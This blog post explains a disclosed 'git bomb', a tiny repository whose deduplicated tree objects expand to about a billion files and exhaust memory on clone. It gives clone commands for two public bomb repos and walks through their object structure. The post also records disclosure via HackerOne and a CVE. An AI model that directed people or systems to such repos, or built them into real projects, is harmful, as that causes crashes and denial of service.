Kate Murphy Twitter Github RSS

Exploding Git Repositories

If you are an adventurous sort (and can handle a potential reboot) I invite you to clone this tiny repo:

$ git clone https://github.com/Katee/git-bomb.git

Were you able to clone it? Unless you have quite a lot of memory (both RAM and storage) git was killed, ran out of memory, or you had to reboot. Why is this? It is a perfectly formed repo made of only 12 objects.

How does a tiny repo cause git to run out of memory? The secret is that git de-duplicates “blobs” (which are used to store files) to make repositories smaller and allow using the same blob when a file remains unchanged between commits. Git also allows de-duplication of “tree” objects (which define the directory structure in a repository). git-bomb tries to make a billion files, however it only has 10 references to the file blob and only has 10 tree objects in all.

This is extremely similar to the “billion laughs” (aka “XML bomb”) hence the name “git bomb”.

Structure

Bottom

At the bottom there is a file blob containing “one laugh”:

$ git show 5faa3895522087022ba6fc9e64b02653bd7c4283
one laugh

There is one tree object that refers to this blob 10 times

$ git ls-tree 6961ae061a9b89b91162c00d55425b39a19c9f90
100644 blob 5faa3895522087022ba6fc9e64b02653bd7c4283	f0
100644 blob 5faa3895522087022ba6fc9e64b02653bd7c4283	f1
# … snipped
100644 blob 5faa3895522087022ba6fc9e64b02653bd7c4283	f9

Middle

Then 9 layers of tree objects that refer to the tree object below them (here is the top tree object):

$ git ls-tree 106d3b1c00034193bbe91194eb8a90fc45006377
040000 tree 8d106ebc17b2de80acefd454825d394b9bc47fe6	d0
040000 tree 8d106ebc17b2de80acefd454825d394b9bc47fe6	d1
# … snipped
040000 tree 8d106ebc17b2de80acefd454825d394b9bc47fe6	d9

Top

The master ref just points to the top-most tree object:

$ git log --pretty=format:"%s | tree: %T"
Create a git bomb | tree: 106d3b1c00034193bbe91194eb8a90fc45006377

Trying to interact with this repo using anything that has to walk the tree (git status, git checkout) runs into memory issues because git builds the tree in memory before writing files to disk. That means the process is killed instead of filling up your disk space.

Other Git Bombs

Here is a slightly different version of the same idea. This repo has 15,000 nested tree objects. On my laptop this ends up blowing up the stack and causing a segfault.

$ git clone https://github.com/Katee/git-bomb-segfault.git

If you’d like to make your own git bombs read the next post Making Your Own Git Bombs.

Updates

2017-10-11: Got a go-ahead from Github on Hackerone to post this.
2017-10-12: Was awarded a bounty by Github on Hackerone.
2017-10-12: This post was on the front page of Hacker News and received comments.
2017-10-13: There is a discussion of this on the git mailing list. It includes a mention of a repo of this nature being uploaded to Github in 2014.
2017-10-14: CVE-2017-15298 💫
2017-10-15: Josh Lee uploaded a similar repo to GitHub long before me and even gave it a very similar name! The actual repo is disabled, and he never wrote about it publicly.

Thank you Wesley for pairing on many weird git repos. He is currently looking for a job, and I can say from experience pairing with him is fantastic. If you are hiring get in touch with him w.aptekar@gmail.com.